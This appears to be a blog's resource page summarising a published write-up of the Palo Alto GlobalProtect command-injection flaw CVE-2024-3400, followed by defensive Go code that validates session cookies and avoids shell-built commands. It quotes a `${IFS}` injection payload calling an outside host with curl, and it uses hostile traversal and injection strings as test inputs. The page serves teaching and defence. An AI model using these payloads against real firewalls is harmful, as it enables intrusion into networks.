Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Palo Alto - Putting The Protecc In GlobalProtect (CVE-2024-3400)

WatchTowr, posted 1 year ago
  • While fuzzing the GlobalProtect firewall, they noticed some interesting behavior in the logs. Attaching a semicolon to the SESSID cookie parameter produced a strange log line: failed to unmarshal session(peekaboo) map, EOF. The EOF stands for end of file, which is very interesting. This is where the bug begins!
  • The EOF indicates that the value is being used to read a file: since a semicolon was appended, no file with that name exists. Adding a slash for a directory gives the nicer error failed to load file. Sick! It's reading a file whose name we control. What about directory traversal?
  • If it cannot find the directory, it attempts to create it. If the file doesn't exist, it simply creates a zero-byte file with the filename intact. By itself, this doesn't seem to have much impact. However, weird primitives tend to break security assumptions made elsewhere in the code, which may no longer hold. So, all we have to do is find some rule that we can violate.
  • Within the telemetry code, it ingests log files. To do this, it builds a curl command line that is run through a shell to transfer the file. Now there is an attacker-controlled file name inside a bash command, and that earlier primitive looks a lot more useful! While playing with this, they noticed that spaces weren't allowed within cookie values. So, we have to get creative!
  • `${IFS}` can be used as a space within bash. So, if we create a filename containing bash metacharacters, like semicolons or backticks, arbitrary commands can be injected. For instance, creating a file in the logs directory via traversal with `curl${IFS}x1.outboundhost.com` in its name causes an outbound curl request. Neat!
  • Although not mentioned in the original post, the vulnerability appears to lie in an underlying library, Gorilla sessions. If so, this arbitrary-file-write primitive likely affects a lot more than just this application.
  • Overall, an awesome post on a bizarre command injection. It took a weird arbitrary file write to trigger, but was interesting. To me, a takeaway is that fuzzing is useful, but it's not launch-and-forget. Instead, reading the error messages, responses and all other available information to look for weird behavior is worthwhile.
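As an added example (not from the WatchTowr post or the product's code), this is the shape of the fix a defender would want for the two links in that chain: the cookie value is validated before it can become a path, and the telemetry upload is built as an argv rather than a shell string. The session directory, upload URL and function names are assumptions made for the example.

```go
package main

import (
	"fmt"
	"os/exec"
	"path/filepath"
	"regexp"
	"strings"
)

// Constructed paths for this example; the product's real ones are not on the page.
const sessionDir = "/opt/example/sessions"
const telemetryURL = "https://telemetry.example.invalid/upload"

// A session id is an opaque token and nothing else. A semicolon, a slash,
// "..", "${IFS}" or a backtick fails this check before the value can reach
// the filesystem or a command line.
var sessionIDPattern = regexp.MustCompile(`^[A-Za-z0-9_-]{16,64}$`)
// SessionPath maps a cookie value to its on-disk path or rejects it.
// The pattern is the real control; the containment check is a second
// layer so that loosening the pattern later still cannot escape sessionDir.
func SessionPath(raw string) (string, error) {
	if !sessionIDPattern.MatchString(raw) {
		return "", fmt.Errorf("session id rejected: %q", raw)
	}
	p := filepath.Join(sessionDir, raw)
	rel, err := filepath.Rel(sessionDir, p)
	if err != nil || rel == ".." || strings.HasPrefix(rel, "../") {
		return "", fmt.Errorf("session id escapes %s: %q", sessionDir, raw)
	}
	return p, nil
}

// ShipLog builds the upload as an argv rather than a shell string, so a
// hostile filename is only ever an argument and cannot become a command.
func ShipLog(path string) *exec.Cmd {
	return exec.Command("curl", "--fail", "-T", path, telemetryURL)
}

func main() {
	// Constructed inputs: a benign token plus the shapes the post describes.
	for _, v := range []string{"b7f3c2a1d4e5f6a7b8c9d0e1", "abc;", "../../../etc/x", "curl${IFS}x1.example.invalid"} {
		if p, err := SessionPath(v); err != nil {
			fmt.Println("rejected:", err)
		} else {
			fmt.Println("accepted:", p, "argv:", ShipLog(p).Args)
		}
	}
}
```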